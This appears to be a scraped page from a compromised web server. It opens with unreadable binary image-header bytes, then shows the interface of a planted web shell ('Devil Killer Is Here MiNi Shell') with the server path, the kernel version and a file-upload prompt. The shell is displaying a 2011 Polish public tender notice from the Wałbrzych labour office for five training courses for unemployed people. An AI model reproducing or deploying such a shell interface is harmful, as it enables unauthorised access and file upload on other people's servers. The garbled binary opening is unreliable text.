JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/128296-N-2011.html

<p class="kh_header"><b>Wałbrzych: Wykonanie pakietu pięciu szkoleń osób bezrobotnych dla Powiatowego Urzędu Pracy w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 128296 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Wałbrzychu , ul. Ogrodowa 5b, 58-306 Wałbrzych, woj. dolnośląskie, tel. 074 8407300, faks 074 8407376.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.urzadpracy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie pakietu pięciu szkoleń osób bezrobotnych dla Powiatowego Urzędu Pracy w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja szkoleń dla bezrobotnych kobiet i mężczyzn z Powiatu Wałbrzyskiego. W ramach zamówienia przeprowadzonych zostanie pięć szkoleń grupowych, łącznie szkoleniami objętych zostanie 58 osób.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Kserokopię dokumentu potwierdzającego dokonanie wpisu wykonawcy do rejestru instytucji szkoleniowych wydany na podstawie art. 20 ust.4 ustawy o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.) przez, właściwy ze względu na siedzibę instytucji szkoleniowej, wojewódzki urząd pracy.
2. Kserokopia dokumentu/ów wydanego/ych przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach poświadczającego/ych, że Wykonawca posiada uprawnienia do prowadzenia kursów oraz wydawania stosownych zaświadczeń w zakresie obsługi wózków jezdniowych z napędem silnikowym - dotyczy pakietu nr 1 i nr 2.
3. Kserokopia atestu lub jednorazowej zgody Instytutu Spawalnictwa w Gliwicach do szkolenia spawaczy zgodnie z Wytycznymi ww. Instytutu Nr w-07/IS/-41
- dotyczy pakietu nr 3
Ocena spełnienia ww. warunków dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez Wykonawcę w ofercie dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia ich działalności jest krótszy - w tym okresie - wykonali, a w przypadku świadczeń okresowych lub ciągłych - wykonują co najmniej 2 usługi przeprowadzenia szkoleń-kursów dla grupy min. 5 osobowej. Wykonawcy ubiegający się o wykonanie kilku części zamówienia winni wykazać wykonanie usług o jakich mowa powyżej odrębnie na każdą z części, na którą składają ofertę (na każdą z części należy wykazać 2 inne usługi) Ocena spełnienia ww. warunków dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez wykonawcę w ofercie dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoba/by prowadzące zajęcia dydaktyczne musi/szą posiadać odpowiednie przygotowanie merytoryczne do prowadzenia zajęć powierzonych jej/im przez Wykonawcę. Stąd też Zamawiający zastrzega sobie, aby osoba/by  zaangażowana/ne w realizację szkolenia dysponowała/ły: 
Pakiet nr 1
1.	Zarządzanie magazynem
2.	Przepływ materiałów i zapasów
3.	Edytor tekstu. Arkusz kalkulacyjny
4. 	Podstawy komputerowego systemu obsługi sprzedaży w handlu hurtowym
5.	Kierowca wózków jezdniowych z napędem silnikowym wraz z bezpieczną obsługą, wymianą butli gazowych.
a)	w przypadku w/w zagadnień w pozycji od 1 do 2 - wykształceniem wyższym i doświadczeniem w prowadzeniu zajęć dla osób dorosłych na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej z zakresu powierzonych im zagadnień,
b)	w przypadku zagadnień w pozycji 3 i 4  - wykształceniem informatycznym lub ekonomicznym (średnim, wyższym bądź ukończyły studia podyplomowe o kierunku informatycznym lub ekonomicznym) oraz doświadczeniem w prowadzeniu zajęć dla osób dorosłych na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej z zakresu powierzonych im zagadnień. 
c)	w przypadku zagadnień w pozycji 5 - doświadczeniem                           w prowadzeniu zajęć dla osób dorosłych na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej w charakterze instruktora nauki jazdy na w/w sprzęcie. 
Pakiet nr 2
Zamawiający zastrzega sobie, aby osoba/y  zaangażowana/ne w realizację szkolenia dysponowała/ły doświadczeniem w prowadzeniu zajęć dla osób dorosłych na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej w charakterze instruktora nauki jazdy na wózkach widłowych. 
Pakiet nr 3
1.	Wykonawca winien wyznaczyć kierownika szkolenia, który posiada kwalifikacje inżyniera lub technologa spawalnika potwierdzone dyplomem Europejskiego/Międzynarodowego Inżyniera Spawalnika (EWE/IWE) lub Europejskiego/Międzynarodowego Technologa Spawalnika (EW/IWT). Do kierowania szkoleniem spawaczy dopuszcza się również osoby                                   o porównywalnych kwalifikacjach posiadających np. wieloletnią praktykę z zakresu spawalnictwa, ukończone kursy z zakresu spawania lub badań, 
2.	Wykładowcą/cami zajęć teoretycznych winien/ny być  inżynier/owie lub technik/cy spawalnik/cy jak również osoba/by posiadająca/cy kwalifikacje instruktora spawania potwierdzone dyplomem Europejskiego/ Międzynarodowego Instruktora Spawalniczego (EWP/IWP). Do prowadzenia zajęć teoretycznych z dziedzin pokrewnych spawalnictwu np. BHP dopuszcza się również osoby o innych kwalifikacjach. Osoba/by prowadząca/ce zajęcia teoretyczne winna/ny posiadać ponadto doświadczenie w prowadzeniu zajęć dla osób dorosłych w okresie trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej z zakresu powierzonych jej/im zagadnień.
3.	Instruktor/rzy szkolenia praktycznego winni posiadać:
a)	ukończony kurs Europejskiego/ Międzynarodowego Instruktora Spawalniczego (EWP/IWP) oraz aktualne Świadectwo Egzaminu Spawacza wg EN 287-1 lub serii norm EN ISO 9606                w procesie spawania odpowiadającego zakresowi prowadzonego szkolenia,
b)	ukończony kurs instruktorów spawania wg krajowych programów szkoleniowych oraz aktualne Świadectwo Egzaminu Spawacza wg EN 287-1 lub serii norm EN ISO 9606                        w procesie spawania odpowiadającego zakresowi prowadzonego szkolenia,
c)	doświadczenie w prowadzeniu zajęć z praktycznej nauki zawodu spawacza dla osób dorosłych na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej.
Zajęcia praktyczne może/gą prowadzić również osoba/by, która/e nie ukończyła/ły kursu instruktora ale posiada/ją akceptację Instytutu Spawalnictwa w Gliwicach do prowadzenia zajęć praktycznych.
Pakiet nr 4
Zamawiający zastrzega sobie, aby osoba/by zaangażowana/ne w realizację szkolenia dysponowała/ły wykształceniem wyższym technicznym i doświadczeniem  w prowadzeniu zajęć dla osób dorosłych zdobytym na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej z zakresu zagadnień dotyczących tego pakietu.
Pakiet nr 5
1.	Nowoczesne techniki i metody sprzedaży
2.	Budowanie relacji z klientem
3.	Psychologia pracy z klientem
4.	Negocjacje handlowe, manipulacje w negocjacjach
5.	Podstawy obsługi komputera (edytor tekstu, podstawy arkusza kalkulacyjnego)
6.	Obsługa użytkowych programów komputerowych wykorzystywanych w pracy w handlu
7.	Obsługa kas fiskalnych  i terminali kart płatniczych
Zamawiający zastrzega sobie, aby osoba/by  zaangażowana/ne w realizację szkolenia dysponowała/ły: 
1.	w przypadku ww. zagadnień wskazanych w pozycji od 1 do 4 - wykształceniem  wyższym oraz doświadczeniem w prowadzeniu zajęć dla osób dorosłych zdobytym na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej z zakresu powierzonych im zagadnień; 
2.	w przypadku zagadnień wskazanych w pozycji od 5 do 7 -  wykształceniem informatycznym lub ekonomicznym (średnim, wyższym bądź ukończyły studia podyplomowe o kierunku informatycznym lub ekonomicznym) oraz doświadczeniem w prowadzeniu zajęć dla osób dorosłych na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej z zakresu powierzonych im zagadnień. 

Zamawiający dopuszcza możliwość prowadzenia zajęć z kilku różnych zagadnień tematycznych przez jedną osobę pod warunkiem, że spełnieni wymagania określone dla tych zagadnień

Ocena spełnienia ww. warunków dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez wykonawcę w ofercie dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp 
2)Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, a w przypadku Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dokumentu wystawionego w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzającego, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy Pzp.
Ocena spełnienia ww. warunków dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez wykonawcę w ofercie dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian w umowach po ich zawarciu w przypadku:
1	Zmiany oznaczenia stron (np. zmiana nazwy, siedziby, NIP-u, REGON -u, osób reprezentujących firmę).
2	Konieczności zmiany terminu realizacji szkolenia z przyczyn nieleżących po stronach umowy (np. działanie siły wyższej) z zastrzeżeniem, że powodem zmiany terminu nie może być brak dostępności kadry prowadzącej szkolenie.
W takim przypadku Wykonawca winien wyznaczyć niezwłocznie (w porozumieniu z Zamawiającym) nowy termin realizacji szkolenia i uzyskać zgodę Zamawiającego na wprowadzenie niniejszej zmiany.
3	Zmiany miejsca realizacji szkolenia pod warunkiem, że nowe miejsce wskazane przez Wykonawcę będzie spełniało wymogi określone w SIWZ.
4	Zmiany rachunku bankowego (np. zmiana banku, numeru) pod warunkiem dostarczenia dokumentu poświadczającego ten fakt.
5	Zmiany kadry w razie niedostępności personelu określonego w wykazie kadry szkoleniowej przedstawionym w ofercie pod warunkiem, że Wykonawca zapewni zastępstwo przez osobę lub osoby o odpowiednim przygotowaniu zawodowym, nie gorszym od przygotowania zawodowego osoby lub osób zastępowanych.  Zastępca będzie mógł przystąpić do realizacji prac przewidzianych w umowie po uzyskaniu przez Wykonawcę pisemnej zgody ze strony Zamawiającego.
6	Zmiany wzoru któregokolwiek dokumentu potwierdzającego zakończenie szkolenia w sytuacji kiedy zmianie ulegną obowiązujące w tym zakresie przepisy.
7	Zmniejszenia przez Wykonawcę kwoty preliminowanych kosztów związanych z realizowanym przedmiotem umowy. 
8	Zmiany terminu egzaminu zewnętrznego z przyczyn niezależnych od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.urzadpracy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Pracy w Wałbrzychu, ul. Ogrodowa 5b, 58-306 Wałbrzych, pok.9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2011 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Wałbrzychu, ul. Ogrodowa 5b, 58-306 Wałbrzych, KANCELARIA (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pracownik hurtowni z elementami logistyki w gospodarce magazynowej, obsługą komputera oraz wózków jezdniowych z napędem silnikowym wraz z bezpieczną obsługą, wymianą butli gazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób: 
Jedna grupa szkoleniowa licząca 10 osób.

Termin realizacji szkolenia :
22.08.2011r. - 30.09.2011r.

Miejsce realizacji szkolenia:
Teren miasta Wałbrzycha.

Program powinien zawierać co najmniej wskazane poniżej minimum programowe:
1.	Zarządzanie magazynem
2.	Przepływ materiałów i zapasów
3.	Edytor tekstu. Arkusz kalkulacyjny
4. 	Podstawy komputerowego systemu obsługi sprzedaży w handlu hurtowym
5.	Kierowca wózków jezdniowych z napędem silnikowym wraz z bezpieczną obsługą, wymianą butli gazowych.

Zagadnienia  dotyczące obsługi wózków silnikowych powinny być zgodne z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. posiadany certyfikat jakości świadczonych przez Wykonawcę usług - 10</li>
<li>3. doświadczenie Wykonawcy - 15</li>
<li>4. kadra - 20</li>
<li>5. potencjał techniczny - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kierowca wózków jezdniowych z napędem silnikowym wraz z bezpieczną obsługą, wymianą butli gazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób: 			
Dwie grupy szkoleniowe po 9 osób każda.
Termin realizacji szkolenia :
04.07.2011r. - 15.07.2011r. 
18.07.2011r. - 29.07.2011r.

Miejsce realizacji szkolenia:
Teren miasta Wałbrzycha.

Program szkolenia powinien zawierać co najmniej wskazane poniżej minimum programowe:
1.	Typy stosowanych wózków jezdniowych
2.	Budowa wózków jezdniowych
3.	Czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy oraz w czasie pracy wózkami
4.	Ładunkoznawstwo
5.	Przepisy BHP
6.	Manewrowanie osprzętem wózków 
7.	Obsług i wymiana butli gazowych 
8.	Wiadomości o dozorze technicznym 
9.	Zajęcia praktyczne

Program szkolenia winien być zgodny z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. posiadany certyfikat jakości świadczonych przez Wykonawcę usług - 10</li>
<li>3. doświadczenie Wykonawcy - 25</li>
<li>4. potencjał techniczny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs spawania blach i rur spoinami pachwinowymi metodą MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób: 			
Jedna grupa szkoleniowa licząca 10 osób.
Termin realizacji szkolenia:
24.10.2011r - 09.12.2011r. 

Miejsce realizacji szkolenia:
Teren miasta Wałbrzycha.
				
Program szkolenia powinien zawierać co najmniej minimum programowe, zgodnie z Wytycznymi Instytutu Spawalnictwa w Gliwicach NR W-07-IS-02.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadany certyfikat jakości świadczonych przez Wykonawcę usług - 10</li>
<li>3. doświadczenie Wykonawcy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Elektryk bez ograniczenia napięcia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób: 			
Jedna grupa szkoleniowa licząca 10 osób.

Termin realizacji szkolenia:
10.10.2011r - 28.10.2011r. 

Miejsce realizacji szkolenia:
Teren miasta Wałbrzycha.
				
Program szkolenia powinien zawierać co najmniej wskazane poniżej minimum programowe:
1.	Przepisy dotyczące zasad eksploatacji urządzeń  i instalacji energetycznych oraz instrukcji eksploatacji urządzeń
2.	Klasyfikacje osób zajmujących się eksploatacją urządzeń energetycznych. Zasady BHP i przeciwpożarowe, ratownictwo
